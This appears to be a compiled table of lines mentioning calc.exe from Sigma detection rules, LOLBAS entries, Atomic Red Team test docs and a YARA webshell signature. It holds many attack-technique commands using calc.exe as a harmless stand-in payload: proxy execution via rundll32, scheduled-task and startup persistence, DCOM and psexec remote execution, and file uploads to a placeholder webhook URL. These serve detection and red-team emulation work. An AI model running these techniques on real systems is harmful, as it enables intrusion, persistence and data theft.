| sigma |
proc_creation_win_susp_calc.yml |
description: Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion |
DRL 1.0 |
| sigma |
proc_creation_win_susp_calc.yml |
CommandLine\|contains: '\calc.exe ' |
DRL 1.0 |
| sigma |
proc_creation_win_susp_calc.yml |
Image\|endswith: '\calc.exe' |
DRL 1.0 |
| sigma |
proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml |
- https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf |
DRL 1.0 |
| sigma |
proc_creation_win_susp_system_user_anomaly.yml |
- '\calc.exe' |
DRL 1.0 |
| LOLBAS |
Explorer.yml |
- Command: explorer.exe calc.exe |
|
| LOLBAS |
Explorer.yml |
Description: 'Executes calc.exe as a subprocess of explorer.exe.' |
|
| LOLBAS |
Gpup.yml |
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe |
|
| LOLBAS |
Nvudisp.yml |
- Command: Nvudisp.exe System calc.exe |
|
| LOLBAS |
Nvudisp.yml |
Description: Execute calc.exe as a subprocess. |
|
| LOLBAS |
Nvudisp.yml |
- Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\" |
|
| LOLBAS |
Nvuhda6.yml |
- Command: nvuhda6.exe System calc.exe |
|
| LOLBAS |
Nvuhda6.yml |
Description: Execute calc.exe as a subprocess. |
|
| LOLBAS |
Nvuhda6.yml |
- Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\" |
|
| LOLBAS |
Nvuhda6.yml |
- Command: nvuhda6.exe KillApp calc.exe |
|
| LOLBAS |
Usbinst.yml |
Description: Execute calc.exe through DefaultInstall Section Directive in INF file. |
|
| LOLBAS |
Bash.yml |
- Command: bash.exe -c calc.exe |
|
| LOLBAS |
Bash.yml |
Description: Executes calc.exe from bash.exe |
|
| LOLBAS |
ConfigSecurityPolicy.yml |
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile |
|
| LOLBAS |
DataSvcUtil.yml |
- Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile |
|
| LOLBAS |
Diskshadow.yml |
- Command: diskshadow> exec calc.exe |
|
| LOLBAS |
Explorer.yml |
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe" |
|
| LOLBAS |
Explorer.yml |
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe |
|
| LOLBAS |
Extrac32.yml |
- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe |
|
| LOLBAS |
Extrac32.yml |
Description: Command for copying calc.exe to another folder |
|
| LOLBAS |
Forfiles.yml |
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe |
|
| LOLBAS |
Forfiles.yml |
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. |
|
| LOLBAS |
Ftp.yml |
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt |
|
| LOLBAS |
Hh.yml |
- Command: HH.exe c:\windows\system32\calc.exe |
|
| LOLBAS |
Hh.yml |
Description: Executes calc.exe with HTML Help. |
|
| LOLBAS |
Pcalua.yml |
- Command: pcalua.exe -a calc.exe |
|
| LOLBAS |
Rundll32.yml |
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. |
|
| LOLBAS |
Rundll32.yml |
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} |
|
| LOLBAS |
Rundll32.yml |
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. |
|
| LOLBAS |
Scriptrunner.yml |
- Command: Scriptrunner.exe -appvscript calc.exe |
|
| LOLBAS |
Scriptrunner.yml |
Description: Executes calc.exe |
|
| LOLBAS |
Ttdinject.yml |
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" |
|
| LOLBAS |
Ttdinject.yml |
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" |
|
| LOLBAS |
Tttracer.yml |
- Command: tttracer.exe C:\windows\system32\calc.exe |
|
| LOLBAS |
Wlrmdr.yml |
- Command: "wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u calc.exe" |
|
| LOLBAS |
Wlrmdr.yml |
Description: Execute calc.exe with wlrmdr.exe as parent process |
|
| LOLBAS |
Advpack.yml |
- Command: rundll32.exe advpack.dll,RegisterOCX calc.exe |
|
| LOLBAS |
Advpack.yml |
- Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
|
| LOLBAS |
Ieadvpack.yml |
- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe |
|
| LOLBAS |
Ieadvpack.yml |
- Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
|
| LOLBAS |
Pcwutl.yml |
- Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe |
|
| LOLBAS |
Setupapi.yml |
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf |
|
| LOLBAS |
Setupapi.yml |
- Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf |
|
| LOLBAS |
Url.yml |
- Command: rundll32.exe url.dll,FileProtocolHandler calc.exe |
|
| LOLBAS |
Zipfldr.yml |
- Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe |
|
| LOLBAS |
Manage-bde.yml |
- Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf |
|
| LOLBAS |
Appvlp.yml |
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" |
|
| LOLBAS |
Sqltoolsps.yml |
- Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe |
|
| LOLBAS |
Vsjitdebugger.yml |
- Command: Vsjitdebugger.exe calc.exe |
|
| LOLBAS |
Vsjitdebugger.yml |
Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. |
|
| LOLBAS |
Wsl.yml |
- Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe |
|
| LOLBAS |
Wsl.yml |
Description: Executes calc.exe from wsl.exe |
|
| atomic-red-team |
problem_report.md |
e.g. The atomic test executes and calc.exe is launched. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1021.003.md |
Upon successful execution, cmd will spawn calc.exe on a remote computer. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1021.003.md |
[activator]::CreateInstance([type]::GetTypeFromProgID(“MMC20.application”,”#{computer_name}”)).Document.ActiveView.ExecuteShellCommand(“c:\windows\system32\calc.exe”, $null, $null, “7”) |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1027.004.md |
| input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder\T1027.004\src\calc.cs| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1036.003.md |
| exe_path | path to exe to use when creating masquerading files | Path | C:\Windows\System32\calc.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1053.005.md |
schtasks /create /tn “T1053_005_OnLogon” /sc onlogon /tr “cmd.exe /c calc.exe” |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1053.005.md |
schtasks /create /tn “T1053_005_OnStartup” /sc onstart /ru system /tr “cmd.exe /c calc.exe” |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1053.005.md |
$Action = New-ScheduledTaskAction -Execute “calc.exe” |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1106.md |
Execute program by leveraging Win32 API’s. By default, this will launch calc.exe from the command prompt. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1112.md |
| new_executable | New executable to run on startup instead of Windows Defender | String | calc.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1134.004.md |
calc.exe will be launched. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1140.md |
| executable | name of executable | Path | C:\Windows\System32\calc.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1140.md |
| executable | name of executable/file to decode | Path | C:\Windows\System32\calc.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1202.md |
Upon execution, calc.exe should open |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1202.md |
| payload_path | Path to payload | Path | C:\Windows\System32\calc.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1202.md |
| process | Process to execute | String | calc.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1202.md |
“This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe” |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1202.md |
Upon execution calc.exe will be opened. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1204.002.md |
Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1204.002.md |
$macrocode = “ Open "#{bat_path}” For Output As #1n Write #1, “calc.exe"n Close #1n a = Shell(“cmd.exe /c $bat_path ", vbNormalFocus)n” |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1204.002.md |
and pull down the script and execute it. By default the payload will execute calc.exe on the system. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1216.md |
Upon execution, calc.exe will be launched. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1216.md |
| command_to_execute | A command to execute. | Path | %windir%\System32\calc.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1218.md |
| powershell_code | PowerShell code to execute | String | Start-Process calc.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1218.md |
Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1218.md |
Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1218.001.md |
Upon execution calc.exe will open |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1218.002.md |
Upon execution calc.exe will be launched |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1218.005.md |
Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1218.005.md |
Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1218.010.md |
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1218.010.md |
windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1218.011.md |
Upon execution calc.exe will be launched |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1218.011.md |
| command_to_execute | Command for rundll32.exe to execute | String | calc.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1218.011.md |
Upon successful execution, Calc.exe will spawn. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1546.012.md |
| target_binary | Binary To Attach To | Path | C:\Windows\System32\calc.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1546.013.md |
Appends a start process cmdlet to the current user’s powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1546.013.md |
| exe_path | Path the malicious executable | Path | calc.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1547.001.md |
$Target = “C:\Windows\System32\calc.exe” |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1547.001.md |
$ShortcutLocation = “$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk” |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1547.001.md |
Remove-Item “$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk” -ErrorAction Ignore |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1547.009.md |
Upon execution, calc.exe will be launched. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1547.009.md |
echo URL=C:\windows\system32\calc.exe » #{shortcut_file_path} |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1559.002.md |
{DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe” } |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1559.002.md |
9. DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe” |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1564.md |
This module extracts a binary (calc.exe) from inside of another binary. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1564.003.md |
Upon execution a hidden PowerShell window will launch calc.exe |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1564.003.md |
| powershell_command | Command to launch calc.exe from a hidden PowerShell Window | String | powershell.exe -WindowStyle hidden calc.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1569.002.md |
Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1569.002.md |
#{psexec_exe} \#{remote_host} -u #{user_name} -p #{password} -accepteula “C:\Windows\System32\calc.exe” |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1574.002.md |
Upon execution, calc.exe will be opened. |
MIT License. © 2018 Red Canary |
| signature-base |
thor-webshells.yar |
$s7 = “""%windir%\\calc.exe"")” |
CC BY-NC 4.0 |